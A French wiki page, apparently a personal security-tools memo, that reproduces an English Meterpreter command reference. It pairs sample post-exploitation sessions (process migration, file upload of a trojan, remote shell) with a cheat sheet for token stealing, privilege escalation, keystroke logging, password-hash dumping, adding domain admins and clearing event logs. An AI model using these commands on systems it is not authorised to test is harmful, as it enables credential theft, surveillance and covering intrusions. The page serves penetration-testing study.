Meterpreter
De Linuxmemo.
(Page créée avec « Catégorie:Securite-outils ==meterpreter== *help The 'help' command, as may be expected, displays the Meterpreter help menu. meterpreter > help Core Commands ======... ») |
|||
Ligne 1 : | Ligne 1 : | ||
[[Catégorie:Securite-outils]] | [[Catégorie:Securite-outils]] | ||
==meterpreter== | ==meterpreter== | ||
+ | (voir [[metasploit]]) | ||
*help | *help |
Version du 30 août 2012 à 08:29
meterpreter
(voir metasploit)
- help
The 'help' command, as may be expected, displays the Meterpreter help menu. meterpreter > help Core Commands =============
Command Description ------- ----------- ? Help menu background Backgrounds the current session channel Displays information about active channels ...snip...
- background
The 'background' command will send the current Meterpreter session to the background and return you to the msf prompt. To get back to your Meterpreter session, just interact with it again. meterpreter > background msf exploit(ms08_067_netapi) > sessions -i 1 [*] Starting interaction with 1... meterpreter >
- ps
The 'ps' command displays a list of running processes on the target. meterpreter > ps Process list ============
PID Name Path --- ---- ---- 132 VMwareUser.exe C:\Program Files\VMware\VMware Tools\VMwareUser.exe 152 VMwareTray.exe C:\Program Files\VMware\VMware Tools\VMwareTray.exe 288 snmp.exe C:\WINDOWS\System32\snmp.exe ...snip...
- migrate
Using the 'migrate' post module, you can migrate to another process on the victim. meterpreter > run post/windows/manage/migrate [*] Running module against V-MAC-XP [*] Current server process: svchost.exe (1076) [*] Migrating to explorer.exe... [*] Migrating into process ID 816 [*] New server process: Explorer.EXE (816) meterpreter >
- ls
As in Linux, the 'ls' command will list the files in the current remote directory. meterpreter > ls Listing: C:\Documents and Settings\victim ========================================= Mode Size Type Last modified Name ---- ---- ---- ------------- ---- 40777/rwxrwxrwx 0 dir Sat Oct 17 07:40:45 -0600 2009 . 40777/rwxrwxrwx 0 dir Fri Jun 19 13:30:00 -0600 2009 .. 100666/rw-rw-rw- 218 fil Sat Oct 03 14:45:54 -0600 2009 .recently-used.xbel 40555/r-xr-xr-x 0 dir Wed Nov 04 19:44:05 -0700 2009 Application Data ...snip...
- download
The 'download' command downloads a file from the remote machine. Note the use of the double-slashes when giving the Windows path. meterpreter > download c:\\boot.ini [*] downloading: c:\boot.ini -> c:\boot.ini [*] downloaded : c:\boot.ini -> c:\boot.ini/boot.ini meterpreter >
- upload
As with the 'download' command, you need to use double-slashes with the 'upload' command. meterpreter > upload evil_trojan.exe c:\\windows\\system32 [*] uploading : evil_trojan.exe -> c:\windows\system32 [*] uploaded : evil_trojan.exe -> c:\windows\system32\evil_trojan.exe meterpreter >
- ipconfig
The 'ipconfig' command displays the network interfaces and addresses on the remote machine. meterpreter > ipconfig MS TCP Loopback interface Hardware MAC: 00:00:00:00:00:00 IP Address : 127.0.0.1 Netmask : 255.0.0.0 AMD PCNET Family PCI Ethernet Adapter - Packet Scheduler Miniport Hardware MAC: 00:0c:29:10:f5:15 IP Address : 192.168.1.104 Netmask : 255.255.0.0 meterpreter >
- getuid
Running 'getuid' will display the user that the Meterpreter server is running as on the host. meterpreter > getuid Server username: NT AUTHORITY\SYSTEM meterpreter >
- execute
The 'execute' command runs a command on the target. meterpreter > execute -f cmd.exe -i -H Process 38320 created. Channel 1 created. Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\WINDOWS\system32>
- shell
The 'shell' command will present you with a standard shell on the target system. meterpreter > shell Process 39640 created. Channel 2 created. Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\WINDOWS\system32>
- idletime
Running 'idletime' will display the number of seconds that the user at the remote machine has been idle. meterpreter > idletime User has been idle for: 5 hours 26 mins 35 secs meterpreter >
- hashdump
The 'hashdump' post module will dump the contents of the SAM database.
help
Open Meterpreter usage help
run scriptname
Run Meterpreter-based scripts; for a full list check the scripts/meterpreter directory
sysinfo
Show the system information on the remote target
ls
List the files and folders on the target
use priv
Load the privilege extension for extended Meterpreter libraries
ps
Show all running processes and which accounts are associated with each process
migrate PID
Migrate to the specific process ID (PID is the target process ID gained from the ps command)
use incognito
Load incognito functions. (Used for token stealing and impersonation on a target machine)
list_tokens -u
List available tokens on the target by user
list_tokens -g
List available tokens on the target by group
impersonate_token DOMAIN_NAME\\USERNAME
Impersonate a token available on the target
steal_token PID
Steal the tokens available for a given process and impersonate that token
drop_token
Stop impersonating the current token
getsystem
Attempt to elevate permissions to SYSTEM-level access through multiple attack vectors
shell
Drop into an interactive shell with all available tokens
execute -f cmd.exe -i
Execute cmd.exe and interact with it
execute -f cmd.exe -i -t
Execute cmd.exe with all available tokens
execute -f cmd.exe -i -H -t
Execute cmd.exe with all available tokens and make it a hidden process
rev2self
Revert back to the original user you used to compromise the target
reg command
Interact, create, delete, query, set, and much more in the target’s registry
setdesktop number
Switch to a different screen based on who is logged in
screenshot
Take a screenshot of the target’s screen
upload file
Upload a file to the target
download file
Download a file from the target
keyscan_start
Start sniffing keystrokes on the remote target
keyscan_dump
Dump the remote keys captured on the target
keyscan_stop
Stop sniffing keystrokes on the remote target
getprivs
Get as many privileges as possible on the target
uictl enable keyboard/mouse
Take control of the keyboard and/or mouse
background
Run your current Meterpreter shell in the background
hashdump
Dump all hashes on the target
use sniffer
Load the sniffer module
sniffer_interfaces
List the available interfaces on the target
sniffer_dump interfaceID pcapname
Start sniffing on the remote target
sniffer_start interfaceID packet-buffer
Start sniffing with a specific range for a packet buffer
sniffer_stats interfaceID
Grab statistical information from the interface you are sniffing
sniffer_stop interfaceID
Stop the sniffer
add_user username password -h ip
Add a user on the remote target
add_group_user “Domain Admins” username -h ip
Add a username to the Domain Administrators group on the remote target
clearev
Clear the event log on the target machine
timestomp
Change file attributes, such as creation date (antiforensics measure)
reboot
Reboot the target machine